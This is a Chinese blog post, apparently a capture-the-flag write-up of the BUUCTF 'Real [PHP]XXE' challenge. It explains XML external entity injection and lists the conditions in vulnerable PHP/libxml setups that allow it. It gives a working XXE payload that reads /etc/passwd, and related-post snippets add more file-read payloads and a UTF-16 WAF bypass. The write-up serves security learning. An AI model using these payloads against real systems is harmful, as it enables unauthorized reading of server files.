BUUCTF-Real-[PHP]XXE

最新推荐文章于 2024-05-28 15:25:07 发布
最新推荐文章于 2024-05-28 15:25:07 发布
阅读量915 收藏 10
点赞数 7
分类专栏: 漏洞复现与研究 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/135962325
版权

目录

1、原理

2、XXE漏洞产生的原因

3、开始复现

paylaod

复现

4、flag

1、原理

XML数据在传输过程中,攻击者强制XML解析器去访问攻击者指定的资源内容(本地/远程),外部实体声明关键字'SYSTEM'会令XML解析器读取数据,并允许它在XML文档中被替换,构造恶意的值,去执行!

XML解析方式:DOM,SAX,JDOM,DOM4J,StAX……都可能会出现外部实体注入漏洞

2、XXE漏洞产生的原因

低版本php

libxml<2.9.1

设置了libxml_disable_entity_loader为FALSE

3、开始复现

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞稀少!

dom.php、SimpleXMLElement.php、simplexml_load_string.php都可以触发XXE漏洞
paylaod
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
    <name>&xxe;</name>
</root>
复现

这里我用的是 SimpleXMLElement.php 

这里使用payload查看了/etc/passwd文件!证实了xxe漏洞可以进行文件读取!

4、flag

是的,在主页就可以找到!

flag{ad2eb59a-d433-4168-99ce-a27245df049b}
真的学不了一点。。。
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf 简单学习xxe
m0_46580995的博客
11-08 1214
buuctf 抓包发现可以xxe payload <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file://文件"> ]> <user> <username>&file;</username> <password>hack</password> </user&g
BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过,
Zero_Adam的博客
04-08 640
二、学的的 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,, 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了 三、 WP 初末 看一下iconv命令吧,总不能一个题什么都没学到东西啊, 语句: iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上
buuCTF Real [php]XXE超简单教程
最新发布
wwwyydshen的博客
05-28 149
在做这个题的时候我习惯性的查看了一下上面的链接结果进入了Github中并且我还抓耳挠腮的找了好久的文件,结果呢毫无头绪,今天做了一道题后我突然有了个想法并且进行了尝试,果然还是运气好找到了解题的方法,并且这个方法特别简单(有点让我觉得之前的抓耳挠腮的样子有点可笑)哈哈哈废话不多说,上解题方式!我们看见上面有个链接,所以会下意识的点击那个链接(我觉得这个链接有点混淆视听了,搞不懂里面到底要找什么,所以这里我没有多做研究,但也研究了好久嘿嘿过程就不说了)进入后你会发现有一个php的文件页面。
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 269
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
BUUCTF/BUU XXE COURSE 1
weixin_44041994的博客
03-22 804
xxe全称是"xml external entity injection",意为xml外部实体注入。服务端接收和解析来自用户端的xml数据,而没有做严格的安全控制,从而导致xml外部实体注入。原理是攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。通过brup suite抓包发现,数据包上传的是xml数据。随意输入数据并登录,发现弹窗。打开页面发现是一个登录页面。所以可能存在xxe漏洞。输入flag,闯关成功。
buuctf [PHP]XXE
qq_1873822的博客
03-14 3586
原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息。仅仅是纯文本,有能力处理纯文本的软件都可以处理 XML。XML 允许创作者定义自己的标签和自己的文档结构。XML 是独立于软件和硬件的信息传输工具。所有现代浏览器都有读取和操作 XML 的内建 XML 解析器,但是不同的浏览器解析的方法不一样的,如在IE中使用loadXML()方法,在其他
buuctf-Real-[PHP-XXE]
weixin_46079186的博客
05-09 1231
题目地址 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 用burp抓包,在后方修改加入payload payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> &
BUUCTF REAL
A_dmin的博客
01-30 4301
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
BUUCTF-Real
weixin_43821278的博客
03-08 4893
BUUCTF-Real
buuoj [PHP]XXE
pondzhang的专栏
05-04 1272
答案就在phpinfo()页面,无需通过xxe注入获得
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
XXE - How to become a Jedi
02-20
XXE漏洞从入门到精通
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞分析 在 Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 ...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 ...XXE 科学技术研究院
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
BUU-Real-[PHP]XXE
七堇年的博客
02-13 2517
BUU-Real-[PHP]XXE
BUUCTF 22
qq_52431855的博客
02-05 331
知识点 XML实体注入漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 详情可见https://www.freebuf.com/vuls/175451.html Unicod.
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 6107
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值